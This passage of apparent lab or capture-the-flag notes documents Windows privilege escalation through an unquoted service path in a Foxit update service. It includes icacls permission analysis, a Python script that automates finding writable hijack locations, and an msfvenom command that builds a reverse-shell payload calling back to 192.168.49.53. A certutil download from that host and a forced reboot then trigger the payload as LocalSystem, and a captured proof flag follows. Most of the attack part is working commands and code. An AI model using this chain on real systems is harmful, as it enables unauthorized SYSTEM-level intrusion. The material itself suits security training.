SERVICE_START_NAME : LocalSystem

C:\UnrealTournament\System>icacls "C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud"
C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

C:\UnrealTournament\System>icacls "C:\Program Files (x86)\Foxit Software\Foxit Reader"
C:\Program Files (x86)\Foxit Software\Foxit Reader fluffy-pc\daisy:(I)(W,Rc,REA,RA)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

-> daisy holds W (write data / create files) on "C:\Program Files (x86)\Foxit Software\Foxit Reader" itself (the ACE has no (IO) flag, so it applies to the folder rather than only to its children), while "Foxit Cloud" is read-only for Users. Because the service path is unquoted, Windows tries "...\Foxit Reader\Foxit.exe" before reaching "...\Foxit Reader\Foxit Cloud\FCUpdateService.exe", so a file of that name in the writable folder runs as LocalSystem when the service starts.
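The reasoning above (unquoted path -> which file names Windows tries -> which of their parent folders we can write to) can be made mechanical so it is not missed on the next box. The script below is an added example, not part of the original notes: it reads BINARY_PATH_NAME from sc qc output, enumerates the names CreateProcess attempts for an unquoted path with spaces (each space-delimited prefix with .exe appended, in order), parses icacls output for ACEs that apply to the folder itself (inherit-only (IO) entries are skipped) and reports the first candidate whose folder is writable by one of the current user's identities. The sample sc qc and icacls texts are the ones shown above rejoined onto single lines; the rights table and the simple DENY handling are simplifying assumptions.

```python
import re

# Constructed samples: the sc qc and icacls output from above, rejoined onto single lines
SC_QC_FOXIT = r"""
SERVICE_NAME: FoxitCloudUpdateService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
        SERVICE_START_NAME : LocalSystem
"""
ICACLS_FOXIT_CLOUD = r"""
C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud NT SERVICE\TrustedInstaller:(I)(F)
                                                       NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                                       NT AUTHORITY\SYSTEM:(I)(F)
                                                       BUILTIN\Administrators:(I)(F)
                                                       BUILTIN\Users:(I)(RX)
                                                       BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                                       CREATOR OWNER:(I)(OI)(CI)(IO)(F)
"""
ICACLS_FOXIT_READER = r"""
C:\Program Files (x86)\Foxit Software\Foxit Reader fluffy-pc\daisy:(I)(W,Rc,REA,RA)
                                                   NT SERVICE\TrustedInstaller:(I)(F)
                                                   NT AUTHORITY\SYSTEM:(I)(F)
                                                   BUILTIN\Administrators:(I)(F)
                                                   BUILTIN\Users:(I)(RX)
                                                   BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                                   CREATOR OWNER:(I)(OI)(CI)(IO)(F)
"""

# principal:(flag)(flag)...(rights); principals may contain spaces (NT AUTHORITY\Authenticated Users)
ACE_RE = re.compile(
    r"(?<!\S)((?:NT SERVICE|NT AUTHORITY|BUILTIN|CREATOR OWNER)(?:\\[^:\\\n]+?)?|Everyone|[A-Za-z0-9_.-]+\\[^:\\\s]+)"
    r":((?:\([^)]*\))+)")
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "GW", "GA"}   # any of these lets you create a file in the folder


def service_binary_path(sc_qc_text):
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_qc_text)
    return m.group(1).strip() if m else None


def hijack_candidates(image_path):
    """Names CreateProcess tries before the real binary for an unquoted path with spaces, in order:
    every space-delimited prefix with '.exe' appended. Empty if the path is quoted or has no spaces."""
    if image_path.startswith('"') or " " not in image_path:
        return []
    end = image_path.lower().find(".exe")
    image = image_path if end < 0 else image_path[:end + 4]      # drop any arguments after the image
    return [image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "]


def writable_by(icacls_text, identities):
    """True if one of `identities` (the user and its groups, as whoami /all prints them) holds a write-capable
    ACE on the folder itself. (IO) entries only govern children; DENY entries are skipped (assumption)."""
    wanted = {i.lower() for i in identities}
    for principal, ace in ACE_RE.findall(icacls_text):
        if principal.lower() not in wanted:
            continue
        groups = re.findall(r"\(([^)]*)\)", ace)
        flags, rights = groups[:-1], set(groups[-1].split(","))
        if "IO" in flags or "DENY" in flags:
            continue
        if rights & WRITE_RIGHTS:
            return True
    return False


def find_hijack(sc_qc_text, icacls_by_dir, identities):
    """Return the first hijack path whose parent folder (per the supplied icacls output) is writable, else None."""
    path = service_binary_path(sc_qc_text)
    for cand in hijack_candidates(path or ""):
        parent = cand.rsplit("\\", 1)[0]
        text = icacls_by_dir.get(parent)
        if text and writable_by(text, identities):
            return cand
    return None


# daisy's identities, from the whoami /all output above
DAISY = ["fluffy-pc\\daisy", "BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users"]

if __name__ == "__main__":
    dirs = {
        r"C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud": ICACLS_FOXIT_CLOUD,
        r"C:\Program Files (x86)\Foxit Software\Foxit Reader": ICACLS_FOXIT_READER,
    }
    print(find_hijack(SC_QC_FOXIT, dirs, DAISY))
```

Run icacls on every parent folder of every candidate (including C:\ and C:\Program Files (x86), which the notes above did not check) and feed all of them in; the earliest writable candidate wins because CreateProcess stops at the first file it finds.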

// Build a reverse shell binary named "Foxit.exe" (the name Windows resolves first inside the writable folder)

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.53 LPORT=4446 -f exe > Foxit.exe

// Fetch the binary onto the target into "C:\Program Files (x86)\Foxit Software\Foxit Reader" (served from a web server on the attack box), with a listener waiting on 4446

C:\Program Files (x86)\Foxit Software\Foxit Reader> certutil -urlcache -split -f http://192.168.49.53/Foxit.exe Foxit.exe
// daisy cannot stop/start the service herself, but it is AUTO_START (START_TYPE : 2) and runs as LocalSystem, so a reboot starts it again and runs our Foxit.exe. shutdown needs SeShutdownPrivilege, which daisy's token holds (listed as Disabled above, i.e. not enabled by default but available). A reboot is disruptive; on a real engagement prefer a service you are allowed to restart.
C:\Program Files (x86)\Foxit Software\Foxit Reader>shutdown /r /t 0

// We get the reverse shell after rebooting the machine

Proof.txt: cf6d948b72c6587110490e6c2f81ec86
// Check the AlwaysInstallElevated policy (MSI packages installed as SYSTEM): neither key exists, so it is not set
C:\UnrealTournament\System>reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
ERROR: The system was unable to find the specified registry key or value.

C:\UnrealTournament\System>reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
ERROR: The system was unable to find the specified registry key or value.

// Found an SQLite database that shows connections to UT99

C:\Users\daisy>type murmur.sqlite
